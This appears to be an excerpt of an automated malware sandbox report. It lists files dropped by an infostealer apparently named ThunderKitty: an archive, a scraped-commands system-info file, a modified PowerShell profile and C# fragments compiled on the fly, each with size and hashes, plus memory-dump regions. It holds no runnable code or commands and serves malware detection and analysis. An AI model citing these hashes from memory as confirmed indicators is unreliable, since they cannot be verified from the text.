C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
67b0a41134410b2b0ad5e01f6966ac1b

SHA1
fe54ad45f0ad2550513048e681ddfa2a47e25a8b

SHA256
d44434e0ea080223e4afa9ed4316cab5805e3d28221df9e8b7e2789a4518faa9

SHA512
efa1f52521bd420657ac5da046b355fc2717f372ebe2fceb4c6e70f26b5a7ec38895131f564b92def508036453669af22262b464c2abfabc664ef4594233e663

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e2ffae1f09795d880e4d1050fb5e1194

SHA1
391a821a754b15654be7cf18347bac67f1bbc682

SHA256
b1e3a0e39734520d8c3b6afa8feeb4bf70890a653939f0727502e66c029f41cb

SHA512
7de2152fced393682299e5f4225b6d90e1e15aaaf4e80e749ea6f5567813532f77972652cfa855ced4ff084784d916caf71f4bdffb96662e884acd46302e5bec

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
51f710cd4139e4b540d5c19c7a8af98c

SHA1
b1ce30c9a65e4166a072f636fcec40bc0b34db3e

SHA256
5b7d514834452b67fe6d3b817c41044dfb7b788d363f465fa0b1a74def4fe82e

SHA512
c0606d6b653e9c7cbc8892fe3282d017c8f07182a58e9927c839495a2337c97a2e3080882bdeebc697ff5fb0f445d32dcb0e0c5867b66af4c8eadcb46a31667e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB1CB.tmp

Filesize
1KB

MD5
2a1e00db18d1798520867e5c8f8ba632

SHA1
846ffd8e24c7c935629e3019922fa8cf41020dae

SHA256
3246c286c393deeaa1db1adf27c645c1643b1dd05ed03b725321ca2f2898b01f

SHA512
a18b7791a62149261f0ded9ef1e7e300d6eb775639b6c663e05cbef40053e20f270e2fbcd4f19e17604c9e27f482236f83ef0d54464d63e43b096f75aec72a21

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB304.tmp

Filesize
1KB

MD5
5f90fcdc25b0a9c204eeacff231866ca

SHA1
8627c23dcd49f2161a9ffb1f88b541caae338e39

SHA256
d65ea35fe4164d8dbe88d3339e3194e049bb0f699f5603292dec611bc0bc338a

SHA512
b594e54f532ee0aa7830d491d3060ed2f5034f65193079b7beb9a84fa6f0bef0541c4bd9c2005bb70a63a05c71ebe4d3fad6506a29eca7804c3eee1817617727

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty.zip

Filesize
82KB

MD5
c68c2aa4623882e9a0c393f5baefd0c1

SHA1
b52b62cae4d49dedc8dc9a967421d6ddf5b26111

SHA256
3b359b80006601e7616c7df3a6b1247e4c6807d7b165230807ce1ab3df538dc9

SHA512
931ca17993bca1996a792a154463e39ec10e7f906ecd423c0d20b6c2774ce10c8e49b679b2752ec82eb6a7b2e5630d0f4fdaa535168d3b72e0555abd1c9ab3bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

Filesize
23KB

MD5
bfe393b53ace43f563c39466b21a1ab5

SHA1
e8004b5bd39e0b7fce340f283c29a165ac2e42e5

SHA256
7eb29d56d7ef3b8b193d844072ddf7d64f59d63d4f481f74b4eef2a9542ff5f6

SHA512
bed84854d96bc6b2f45d2b93aa444132c53ad6dbe8b4c93939f2d7b3521649bef83d13fc9003c6ede2a5adb64b1ee4ff9c456af00032f477b993003981dfe14f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cgvh0mpq.v2i.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\bansvk1u\bansvk1u.dll

Filesize
4KB

MD5
e15ca2fccd3269e147a14c18f1ac3316

SHA1
607ab96aa19da8553f7185a06cdab0d31557a9c1

SHA256
2a39bfa49b51d5eebfdb3cc0d92ea61cdb351885f1ea6a84092edfc143772896

SHA512
7e04966c8db144d03a5375c24ca48fa605a8d384c99851a4a62a7e2bde8e7c64c191af6f4ba0e40bd132fca662d1b1688f47273390a799d02d0c6241b07e6a72

Download Submit
C:\Users\Admin\AppData\Local\Temp\heqgxv2g\heqgxv2g.dll

Filesize
4KB

MD5
c9c6ff9c4dee237fb944799a61a8eefd

SHA1
f4639673c116d0e27c1b70ed9fe46c3bf5e1d655

SHA256
2adc06191be6faff4fcd216da0a20740d8f10bbd33946b24ed611ff816b297f5

SHA512
58544c1ec4dac3e6ba7ad780c893e1871799d178fb6730ad7a8c433085364b34e086689915d0ca94f28cb9a61a5d31a5f207c06a11d059feaddce88a6bafd332

Download Submit
C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

Filesize
2KB

MD5
9758656bbe8589c66bb241b052490c72

SHA1
b73da83fb3ae6b86c6365769a04de9845d5c602c

SHA256
e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351

SHA512
da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bansvk1u\CSC4DDE922E5EE45DAA9BEC2D610A3F14A.TMP

Filesize
652B

MD5
e0c30a98b698fa6a81103f31088db97e

SHA1
62c9ccddab80400edbcbb84f01bf036181570534

SHA256
6a8e19d714b5d120c23a270377d164c1f97be913c485d4e9ad1e01c5429d2958

SHA512
ac650e4c3d64c52f77ae060946d3bfc19f4f2facb91bdfc8e39f1dd882dcd4966073afafd0bef92fee7ef285f9284a842910fd3de0efccec2cc6be8e20a3fe45

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bansvk1u\bansvk1u.0.cs

Filesize
1KB

MD5
8a1e7edb2117ec5dde9a07016905923b

SHA1
0155dbeeb16333e2eaa767b0209750efee56f47f

SHA256
c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

SHA512
4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bansvk1u\bansvk1u.cmdline

Filesize
369B

MD5
e0196ce34b46c3e9f4e5810824c774c3

SHA1
47236cde0f1deecd9bd79d2a0fd85960ced8c083

SHA256
527045298c51e1503648aab1508dce2ef4282d88ceb68e3129bb6e647ac73150

SHA512
071cdd3668f82f64baadd82a0a9c56fe384a5c9ca600b9007bc321fa571b9e79740b5402bde7dd7bde06c55b91ac9e5f15327b810dc3bf150f19b783d90d3c02

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\heqgxv2g\CSCE8DAB60AF0764C28A2F689E0DE1F9AE1.TMP

Filesize
652B

MD5
7cf177595c7a433b2c488fac3f14ddb0

SHA1
0a319ad378b73f2b6d9c0a3a9c9d4a132ba4ef40

SHA256
13acdd0cf339c750c225fc36f03a435464eb1220e82f8048ecf9df90482c61b3

SHA512
114ade6242198ca1eaa31f9b06bb4d2292d2eabfc00ae9d5c79ca60a865a670f21d6e17a1ca7394b5e9ec49b2a74df04dcf39593eef6d3320b4d162de9167d67

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\heqgxv2g\heqgxv2g.cmdline

Filesize
369B

MD5
d7d9112d3781b67c23a22abd87ebdc1e

SHA1
e29138939ab2387ca690ce0d69a4beab169bfd39

SHA256
75beccbb0004583e54d2f933b6703321625b5660914536433ec06a34a2080fb4

SHA512
bdfe9ebbd8a9e0ef98e94f04df25d220049bb3060b60838021d87745ceb1d3e2e6ce25d49f27c214affd752f3ea27cc580a37a465eda0ff7fbe0a808f5d3265d

Download Submit
memory/2608-46-0x00007FFDBC740000-0x00007FFDBD201000-memory.dmp

Filesize
10.8MB

Download
memory/2608-42-0x00007FFDBC740000-0x00007FFDBD201000-memory.dmp

Filesize
10.8MB

Download
memory/2608-23-0x00007FFDBC740000-0x00007FFDBD201000-memory.dmp

Filesize
10.8MB

Download
memory/2608-75-0x000002AB30210000-0x000002AB30218000-memory.dmp

Filesize
32KB

Download
memory/2608-21-0x000002AB30220000-0x000002AB30242000-memory.dmp

Filesize
136KB

Download
memory/2608-97-0x00007FFDBC740000-0x00007FFDBD201000-memory.dmp

Filesize
10.8MB

Download
memory/3316-65-0x00007FFDBC740000-0x00007FFDBD201000-memory.dmp

Filesize
10.8MB

Download
memory/3316-0-0x00007FFDBC743000-0x00007FFDBC745000-memory.dmp

Filesize
8KB

Download
memory/3316-22-0x00007FFDBC740000-0x00007FFDBD201000-memory.dmp

Filesize
10.8MB

Download
memory/3316-1-0x00007FFDBC740000-0x00007FFDBD201000-memory.dmp

Filesize
10.8MB

Download
memory/3324-45-0x00007FFDBC740000-0x00007FFDBD201000-memory.dmp

Filesize
10.8MB

Download
memory/3324-95-0x0000017C29BC0000-0x0000017C29BEA000-memory.dmp

Filesize
168KB

Download
memory/3324-96-0x0000017C29BC0000-0x0000017C29BE4000-memory.dmp

Filesize
144KB

Download
memory/3324-84-0x0000017C2A100000-0x0000017C2A8A6000-memory.dmp

Filesize
7.6MB

Download
memory/3324-82-0x0000017C295A0000-0x0000017C295A8000-memory.dmp

Filesize
32KB

Download
memory/3324-130-0x0000017C29BB0000-0x0000017C29BC2000-memory.dmp

Filesize
72KB

Download
memory/3324-131-0x0000017C29BA0000-0x0000017C29BAA000-memory.dmp

Filesize
40KB

Download
memory/3324-47-0x00007FFDBC740000-0x00007FFDBD201000-memory.dmp

Filesize
10.8MB

Download
memory/3324-140-0x00007FFDBC740000-0x00007FFDBD201000-memory.dmp

Filesize
10.8MB

Download
memory/3324-44-0x00007FFDBC740000-0x00007FFDBD201000-memory.dmp

Filesize
10.8MB

Download